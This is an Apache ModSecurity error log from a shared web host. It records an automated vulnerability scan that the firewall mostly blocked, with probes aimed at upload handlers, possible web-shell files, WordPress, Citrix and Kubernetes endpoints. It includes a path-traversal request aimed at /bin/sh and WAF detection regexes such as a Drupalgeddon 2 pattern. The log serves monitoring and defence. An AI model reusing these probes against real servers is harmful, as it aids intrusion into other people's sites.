[Tue May 26 12:51:46.303365 2026] [security2:error] [pid 461618:tid 461795] [client 23.94.40.119:52236] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/php/upload.php"] [unique_id "ahVKClyiSlSCHr1fdr2b3AAAALQ"], referer: https://www.madrasbarassociation.org.in.svijaykumar.in
[Tue May 26 12:51:46.395834 2026] [security2:error] [pid 461618:tid 461751] [client 23.94.40.119:52256] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/install/install.php"] [unique_id "ahVKClyiSlSCHr1fdr2b4QAAAIg"]
[Tue May 26 12:51:46.563796 2026] [security2:error] [pid 461618:tid 461756] [client 23.94.40.119:52278] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/Uploads/3EFh8IjQmo8YemCVa1ibDbMgFfU.php7"] [unique_id "ahVKClyiSlSCHr1fdr2b6QAAAI0"]
[Tue May 26 12:51:46.668966 2026] [security2:error] [pid 461618:tid 461839] [client 23.94.40.119:52294] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/install/includes/configure.php"] [unique_id "ahVKClyiSlSCHr1fdr2b7gAAAOA"]
[Tue May 26 12:51:47.162966 2026] [security2:error] [pid 461618:tid 461764] [client 23.94.40.119:52308] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-admin/options-general.php"] [unique_id "ahVKC1yiSlSCHr1fdr2cAwAAAJU"]
[Tue May 26 12:51:47.610334 2026] [security2:error] [pid 461618:tid 461835] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKC1yiSlSCHr1fdr2cBAAAANw"]
[Tue May 26 12:51:47.709349 2026] [cgid:error] [pid 461618:tid 461864] [client 23.94.40.119:52326] AH01264: stderr from /home2/svijakqj/madrasbarassociation.org.in/soap.cgi: script not found or unable to stat
[Tue May 26 12:51:47.851251 2026] [security2:error] [pid 461618:tid 461832] [client 23.94.40.119:52358] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVKC1yiSlSCHr1fdr2cFwAAANk"]
[Tue May 26 12:51:47.879635 2026] [security2:error] [pid 461618:tid 461769] [client 23.94.40.119:52340] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/index.php"] [unique_id "ahVKC1yiSlSCHr1fdr2cHAAAAJo"]
[Tue May 26 12:51:47.955779 2026] [security2:error] [pid 461618:tid 461761] [client 23.94.40.119:52360] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/login.php"] [unique_id "ahVKC1yiSlSCHr1fdr2cHQAAAJI"]
[Tue May 26 12:51:48.002782 2026] [security2:error] [pid 461618:tid 461845] [client 23.94.40.119:59502] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVKC1yiSlSCHr1fdr2cHwAAAOY"]
[Tue May 26 12:51:48.150868 2026] [security2:error] [pid 461618:tid 461806] [client 23.94.40.119:59490] ModSecurity: Access denied with code 406 (phase 2). Pattern match "#(submit|validate|pre_render|post_render|element_validate|after_build|value_callback|process|access_callback|lazy_builder|type|markup|value|options)" at ARGS:element_parents. [file "/opt/mod_security/hg_rules.conf"] [line "1455"] [id "9099997"] [msg "Drupalgeddon 2 Block"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/user/register"] [unique_id "ahVKC1yiSlSCHr1fdr2cHgAAAL8"], referer: www.madrasbarassociation.org.in.svijaykumar.in/user/register
[Tue May 26 12:51:48.150989 2026] [security2:error] [pid 461618:tid 461806] [client 23.94.40.119:59490] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "160"] [id "900408"] [msg "register POST logging"] [data "406"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/user/register"] [unique_id "ahVKC1yiSlSCHr1fdr2cHgAAAL8"], referer: www.madrasbarassociation.org.in.svijaykumar.in/user/register
[Tue May 26 12:51:48.447457 2026] [security2:error] [pid 461618:tid 461790] [client 23.94.40.119:59532] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/webtools/control/httpService"] [unique_id "ahVKDFyiSlSCHr1fdr2cLwAAAK8"]
[Tue May 26 12:51:48.450492 2026] [security2:error] [pid 461618:tid 461827] [client 23.94.40.119:59516] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/umotion/modules/reporting/track_import_export.php"] [unique_id "ahVKDFyiSlSCHr1fdr2cMAAAANQ"]
[Tue May 26 12:51:48.635802 2026] [security2:error] [pid 461618:tid 461783] [client 23.94.40.119:59530] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/scripts/ajaxPortal.lua"] [unique_id "ahVKDFyiSlSCHr1fdr2cOAAAAKg"]
[Tue May 26 12:51:48.636138 2026] [security2:error] [pid 461618:tid 461817] [client 23.94.40.119:59528] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/umotion/modules/reporting/track_import_export.php"] [unique_id "ahVKDFyiSlSCHr1fdr2cNwAAAMo"]
[Tue May 26 12:51:49.135616 2026] [security2:error] [pid 461618:tid 461816] [client 23.94.40.119:59538] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/plugins/ueditor/php/controller.php"] [unique_id "ahVKDVyiSlSCHr1fdr2cTAAAAMk"]
[Tue May 26 12:51:49.149398 2026] [security2:error] [pid 461618:tid 461843] [client 23.94.40.119:59550] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/jQuery-File-Upload/server/php/index.php"] [unique_id "ahVKDVyiSlSCHr1fdr2cTQAAAOQ"]
[Tue May 26 12:51:49.166188 2026] [security2:error] [pid 461618:tid 461871] [client 23.94.40.119:59666] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/files/8MxecCJt.php"] [unique_id "ahVKDVyiSlSCHr1fdr2cTgAAAQA"]
[Tue May 26 12:51:49.273321 2026] [security2:error] [pid 461618:tid 461854] [client 23.94.40.119:59594] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/jquery-file-upload/server/php/index.php/files/8MxecCJt.php"] [unique_id "ahVKDVyiSlSCHr1fdr2cTwAAAO8"]
[Tue May 26 12:51:49.287321 2026] [security2:error] [pid 461618:tid 461815] [client 23.94.40.119:59566] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/jQuery-File-Upload/server/php/index.php/files/8MxecCJt.php"] [unique_id "ahVKDVyiSlSCHr1fdr2cUAAAAMg"]
[Tue May 26 12:51:49.290672 2026] [security2:error] [pid 461618:tid 461776] [client 23.94.40.119:59682] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/example/upload.php"] [unique_id "ahVKDVyiSlSCHr1fdr2cUgAAAKE"]
[Tue May 26 12:51:49.290856 2026] [security2:error] [pid 461618:tid 461834] [client 23.94.40.119:59578] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/files/8MxecCJt.php"] [unique_id "ahVKDVyiSlSCHr1fdr2cUQAAANs"]
[Tue May 26 12:51:49.290989 2026] [security2:error] [pid 461618:tid 461846] [client 23.94.40.119:59580] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/jquery-file-upload/server/php/index.php"] [unique_id "ahVKDVyiSlSCHr1fdr2cUwAAAOc"]
[Tue May 26 12:51:49.344095 2026] [security2:error] [pid 461618:tid 461788] [client 23.94.40.119:59720] ModSecurity: Access denied with code 406 (phase 1). Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "232"] [id "900331"] [msg "Joomla Com_Content SQL Injection POST"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/php/index.php"] [unique_id "ahVKDVyiSlSCHr1fdr2cVQAAAK0"]
[Tue May 26 12:51:49.344343 2026] [security2:error] [pid 461618:tid 461851] [client 23.94.40.119:59698] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/example/upload.php/files/8MxecCJt.php"] [unique_id "ahVKDVyiSlSCHr1fdr2cVAAAAOw"]
[Tue May 26 12:51:49.344746 2026] [security2:error] [pid 461618:tid 461826] [client 23.94.40.119:59736] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/php/index.php/files/8MxecCJt.php"] [unique_id "ahVKDVyiSlSCHr1fdr2cVgAAANM"]
[Tue May 26 12:51:49.344977 2026] [security2:error] [pid 461618:tid 461875] [client 23.94.40.119:59748] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/files/8MxecCJt.php"] [unique_id "ahVKDVyiSlSCHr1fdr2cVwAAAQQ"]
[Tue May 26 12:51:49.345141 2026] [security2:error] [pid 461618:tid 461847] [client 23.94.40.119:59708] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/files/8MxecCJt.php"] [unique_id "ahVKDVyiSlSCHr1fdr2cWAAAAOg"]
[Tue May 26 12:51:49.345606 2026] [security2:error] [pid 461618:tid 461781] [client 23.94.40.119:59652] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/server/php/UploadHandler.php/files/8MxecCJt.php"] [unique_id "ahVKDVyiSlSCHr1fdr2cWQAAAKY"]
[Tue May 26 12:51:49.376459 2026] [security2:error] [pid 461618:tid 461807] [client 23.94.40.119:59606] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/files/8MxecCJt.php"] [unique_id "ahVKDVyiSlSCHr1fdr2cWgAAAMA"]
[Tue May 26 12:51:49.380196 2026] [security2:error] [pid 461618:tid 461808] [client 23.94.40.119:59618] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/server/php/upload.class.php/files/8MxecCJt.php"] [unique_id "ahVKDVyiSlSCHr1fdr2cWwAAAME"]
[Tue May 26 12:51:49.566020 2026] [security2:error] [pid 461618:tid 461778] [client 23.94.40.119:59632] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/files/8MxecCJt.php"] [unique_id "ahVKDVyiSlSCHr1fdr2caAAAAKM"]
[Tue May 26 12:51:49.566307 2026] [security2:error] [pid 461618:tid 461771] [client 23.94.40.119:59638] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/server/php/UploadHandler.php"] [unique_id "ahVKDVyiSlSCHr1fdr2caQAAAJw"]
[Tue May 26 12:51:49.598668 2026] [security2:error] [pid 461618:tid 461763] [client 23.94.40.119:59764] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/server/php/upload.class.php"] [unique_id "ahVKDVyiSlSCHr1fdr2cawAAAJQ"]
[Tue May 26 12:51:49.933857 2026] [security2:error] [pid 461618:tid 461779] [client 172.226.44.135:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVKDVyiSlSCHr1fdr2cdQAAAKQ"]
[Tue May 26 12:51:50.059276 2026] [security2:error] [pid 461618:tid 461850] [client 23.94.40.119:59852] ModSecurity: Access denied with code 406 (phase 2). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/etc/httpd/modsecurity.d/01_asl_content.conf"] [line "64"] [id "391213"] [msg "Atomicorp.com WAF Rules: Request content type is not allowed by policy"] [data "application/yaml"] [severity "WARNING"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/apis/authorization.k8s.io/v1/selfsubjectaccessreviews"] [unique_id "ahVKDlyiSlSCHr1fdr2cgAAAAOs"]
[Tue May 26 12:51:50.113833 2026] [security2:error] [pid 461618:tid 461767] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKDVyiSlSCHr1fdr2ccgAAAJg"]
[Tue May 26 12:51:50.250465 2026] [security2:error] [pid 461618:tid 461774] [client 23.94.40.119:59882] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-admin/admin-post.php"] [unique_id "ahVKDlyiSlSCHr1fdr2ciQAAAJ8"]
[Tue May 26 12:51:50.251447 2026] [security2:error] [pid 461618:tid 461874] [client 23.94.40.119:59866] ModSecurity: Access denied with code 406 (phase 2). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/etc/httpd/modsecurity.d/01_asl_content.conf"] [line "64"] [id "391213"] [msg "Atomicorp.com WAF Rules: Request content type is not allowed by policy"] [data "multipart/mixed"] [severity "WARNING"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/crowd/admin/uploadplugin.action"] [unique_id "ahVKDlyiSlSCHr1fdr2ciAAAAQM"]
[Tue May 26 12:51:50.387834 2026] [security2:error] [pid 461618:tid 461815] [client 85.208.96.202:18772] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/july-8-12/day/2022-10-18/"] [unique_id "ahVKDlyiSlSCHr1fdr2cigAAAMg"]
[Tue May 26 12:51:50.387970 2026] [security2:error] [pid 461618:tid 461815] [client 85.208.96.202:18772] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/july-8-12/day/2022-10-18/"] [unique_id "ahVKDlyiSlSCHr1fdr2cigAAAMg"]
[Tue May 26 12:51:50.669476 2026] [security2:error] [pid 461618:tid 461790] [client 23.94.40.119:59938] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-login.php"] [unique_id "ahVKDlyiSlSCHr1fdr2cmAAAAK8"]
[Tue May 26 12:51:50.967441 2026] [security2:error] [pid 461618:tid 461809] [client 23.94.40.119:59998] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/index.php/Index/index"] [unique_id "ahVKDlyiSlSCHr1fdr2cpAAAAMI"]
[Tue May 26 12:51:50.996432 2026] [security2:error] [pid 461618:tid 461816] [client 74.249.173.207:6091] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "swamijifoundation.in.svijaykumar.in"] [uri "/inputs.php"] [unique_id "ahVKDlyiSlSCHr1fdr2cpQAAAMk"]
[Tue May 26 12:51:51.083112 2026] [security2:error] [pid 461618:tid 461869] [client 23.94.40.119:60012] ModSecurity: Access denied with code 406 (phase 2). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/etc/httpd/modsecurity.d/01_asl_content.conf"] [line "64"] [id "391213"] [msg "Atomicorp.com WAF Rules: Request content type is not allowed by policy"] [data "application/vnd.citrix.requesttoken+xml"] [severity "WARNING"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/Citrix/StoreAuth/ExplicitForms/Start"] [unique_id "ahVKD1yiSlSCHr1fdr2cqgAAAP4"]
[Tue May 26 12:51:51.247293 2026] [cgid:error] [pid 461618:tid 461854] [client 23.94.40.119:60036] AH01264: stderr from /home2/svijakqj/madrasbarassociation.org.in/password_change.cgi: script not found or unable to stat, referer: https://www.madrasbarassociation.org.in.svijaykumar.in
[Tue May 26 12:51:51.720550 2026] [security2:error] [pid 461618:tid 461814] [client 23.94.40.119:60074] ModSecurity: Access denied with code 406 (phase 1). Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "232"] [id "900331"] [msg "Joomla Com_Content SQL Injection POST"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/session_login.cgi"] [unique_id "ahVKD1yiSlSCHr1fdr2cxAAAAMc"], referer: https://www.madrasbarassociation.org.in.svijaykumar.in
[Tue May 26 12:51:51.722532 2026] [cgid:error] [pid 461618:tid 461771] [client 23.94.40.119:60076] AH01264: stderr from /home2/svijakqj/madrasbarassociation.org.in/session_login.cgi: script not found or unable to stat, referer: https://www.madrasbarassociation.org.in.svijaykumar.in
[Tue May 26 12:51:51.728876 2026] [cgid:error] [pid 461618:tid 461749] [client 23.94.40.119:60064] AH01264: stderr from /home2/svijakqj/madrasbarassociation.org.in/rpc.cgi: script not found or unable to stat, referer: https://www.madrasbarassociation.org.in.svijaykumar.in/sysinfo.cgi?xnavigation=1
[Tue May 26 12:51:51.736226 2026] [security2:error] [pid 461618:tid 461823] [client 23.94.40.119:60078] ModSecurity: Access denied with code 406 (phase 1). Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "232"] [id "900331"] [msg "Joomla Com_Content SQL Injection POST"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/rpc.cgi"] [unique_id "ahVKD1yiSlSCHr1fdr2cyQAAANA"], referer: https://www.madrasbarassociation.org.in.svijaykumar.in/sysinfo.cgi?xnavigation=1
[Tue May 26 12:51:52.294751 2026] [cgid:error] [pid 461618:tid 461785] [client 23.94.40.119:60090] AH01264: stderr from /home2/svijakqj/madrasbarassociation.org.in/cgi-bin/protected: script not found or unable to stat
[Tue May 26 12:51:52.538183 2026] [security2:error] [pid 461618:tid 461840] [client 23.94.40.119:60098] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^0$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "96"] [id "392301"] [rev "7"] [msg "Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [tag "no_ar"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/.%0d./.%0d./.%0d./.%0d./bin/sh"] [unique_id "ahVKEFyiSlSCHr1fdr2c4AAAAOE"]
[Tue May 26 12:51:52.970869 2026] [security2:error] [pid 461618:tid 461775] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKEFyiSlSCHr1fdr2c5AAAAKA"]
[Tue May 26 12:51:53.160023 2026] [security2:error] [pid 461618:tid 461869] [client 157.20.138.61:54872] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVKEVyiSlSCHr1fdr2c8gAAAP4"]
[Tue May 26 12:51:53.160158 2026] [security2:error] [pid 461618:tid 461869] [client 157.20.138.61:54872] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVKEVyiSlSCHr1fdr2c8gAAAP4"]
[Tue May 26 12:51:53.726851 2026] [cgid:error] [pid 461618:tid 461768] [client 23.94.40.119:60128] AH01264: stderr from /home2/svijakqj/madrasbarassociation.org.in/apply_sec.cgi: script not found or unable to stat, referer: https://www.madrasbarassociation.org.in.svijaykumar.in
[Tue May 26 12:51:53.846102 2026] [security2:error] [pid 461618:tid 461756] [client 23.94.40.119:60140] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatchFromFile sitelock.txt" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "398"] [id "900247"] [msg "Wordpress Plugin README.txt file access attempt"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-content/plugins/visualizer/readme.txt"] [unique_id "ahVKEVyiSlSCHr1fdr2dCwAAAI0"]
